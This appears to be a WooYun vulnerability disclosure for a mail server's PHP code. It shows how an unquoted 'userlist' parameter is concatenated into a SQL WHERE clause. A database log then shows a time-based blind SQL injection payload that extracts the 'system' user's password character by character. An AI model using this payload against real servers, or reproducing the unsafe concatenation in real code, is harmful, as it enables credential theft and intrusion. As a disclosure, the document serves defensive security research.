WooYun.org

if ( ACTION == "save-to-pab" )
{
		include_once( LIB_PATH."PAB.php" );
		$PAB = PAB::getinstance( );
		$maillist_id = trim( $_GET['maillist'] );
		if ( $maillist_id )
		{
				$member_all = $Maillist->getMemberByMaillistID( $maillist_id, "Mailbox,FullName", 0 );
				if ( !$member_all )
				{
						dump_json( array( "status" => TRUE, "message" => "" ) );
				}
				foreach ( $member_all as $member )
				{
						if ( !$PAB->getContactByMail( $user_id, $member['Mailbox'], "contact_id", 0 ) )
						{
								$data = array(
										"user_id" => $user_id,
										"fullname" => $member['FullName'],
										"pref_email" => $member['Mailbox'],
										"updated" => date( "Y-m-d H:i:s" )
								);
								$res = $PAB->add_contact( $data, 0 );
								if ( !$res )
								{
										dump_json( array( "status" => FALSE, "message" => "添加联系人时发生错误，添加失败！" ) );
								}
						}
				}
		}
		else
		{//不提交maillist，进入
				$user_ids = trim( $_GET['userlist'] );
				if ( !$user_ids )
				{
						dump_msg( "param_error", "参数错误！" );
				}
				$where = "t1.UserID IN (".$user_ids.")";无单引号，产生注入
				$arr_tmp = $Mailbox->getMailboxInfo( $domain_id, $where, "", "", "", "", 0 );
				$user_all = $arr_tmp['data'];
				if ( !$user_all )
				{
						dump_json( array( "status" => TRUE, "message" => "" ) );
				}

public function getMailboxInfo( $_obfuscate_AkPSczrCIu40, $_obfuscate_IRFhnYwÿ = "", $_obfuscate_AedrEgÿÿ = "", $_obfuscate_xvYeh9Iÿ = "", $_obfuscate_tUi30UB0e88ÿ = "", $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ = FALSE, $_obfuscate_ySeUHBwÿ = FALSE )
		{
				$_obfuscate_AkPSczrCIu40 = intval( $_obfuscate_AkPSczrCIu40 );
				$_obfuscate_zbtFQY92OYenSG9u = "t1.DomainID='".$_obfuscate_AkPSczrCIu40."' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0";
				if ( $_obfuscate_IRFhnYwÿ )
				{
						$_obfuscate_zbtFQY92OYenSG9u .= " AND ".$_obfuscate_IRFhnYwÿ;//直接拼接where语句，并最终执行sql语句
				}
				if ( $_obfuscate_xvYeh9Iÿ )
				{
						if ( $_obfuscate_AedrEgÿÿ )
						{
								$_obfuscate_mV9HBLYÿ = $_obfuscate_AedrEgÿÿ * $_obfuscate_xvYeh9Iÿ - $_obfuscate_xvYeh9Iÿ;
						}
						if ( $_obfuscate_mV9HBLYÿ )
						{
								$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_mV9HBLYÿ.",".$_obfuscate_xvYeh9Iÿ;
						}
						else
						{
								$_obfuscate_UFlHiZJcJu6DQBFE = "LIMIT ".$_obfuscate_xvYeh9Iÿ;
						}
				}
				if ( $_obfuscate_tUi30UB0e88ÿ )
				{
						$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY ".$_obfuscate_tUi30UB0e88ÿ;
						if ( $_obfuscate_u5srL4rM3PZJLvpPhQÿÿ )
						{
								$_obfuscate_5e2O0TiivW7ec4cÿ .= " DESC";
						}
						$_obfuscate_5e2O0TiivW7ec4cÿ .= ",t1.FullName ASC";
				}
				else
				{
						$_obfuscate_5e2O0TiivW7ec4cÿ = "ORDER BY t1.OrderNo DESC,t1.Mailbox ASC";
				}
				$_obfuscate_mGXfswsMZQÿÿ = "SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*\r\n\t\t\t\tFROM ".$this->get_table_name( "mailbox" )." as t1, ".$this->get_table_name( "info" )." as t2\r\n\t\t\t\tWHERE ".$_obfuscate_zbtFQY92OYenSG9u."\r\n\t\t\t\t".$_obfuscate_5e2O0TiivW7ec4cÿ;
				$_obfuscate_YdwIclUMQÿÿ = $_obfuscate_mGXfswsMZQÿÿ." ".$_obfuscate_UFlHiZJcJu6DQBFE;
				if ( $_obfuscate_ySeUHBwÿ )
				{
						dump( $_obfuscate_YdwIclUMQÿÿ );
				}
				$_obfuscate_MbMfEtWGUpEscGl = $this->db_count( $_obfuscate_mGXfswsMZQÿÿ );
				unset( $_obfuscate_1LzzW8sGEkLaizkÿ );
				$_obfuscate_6RYLWQÿÿ = $this->db_select( $_obfuscate_YdwIclUMQÿÿ, "more" );
				return array(
						"count" => $_obfuscate_MbMfEtWGUpEscGl,
						"data" => $_obfuscate_6RYLWQÿÿ
				);
		}

150121 20:11:25	 2263 Connect	umail@localhost on 
		 2263 Query	SET NAMES 'UTF8'
		 2263 Init DB	umail
		 2263 Query	SELECT t1.UserID,t1.Mailbox,t1.FullName,t1.EnglishName,t2.*
				FROM userlist as t1, mailuserinfo as t2
				WHERE t1.DomainID='1' AND t1.UserID>2 AND t1.UserID=t2.UserID AND t2.is_hidden=0 AND t1.UserID IN (if(ascii(substr((select password from userlist where FullName=0x73797374656D),1,1))=97,sleep(5),1))
				ORDER BY t1.OrderNo DESC,t1.Mailbox ASC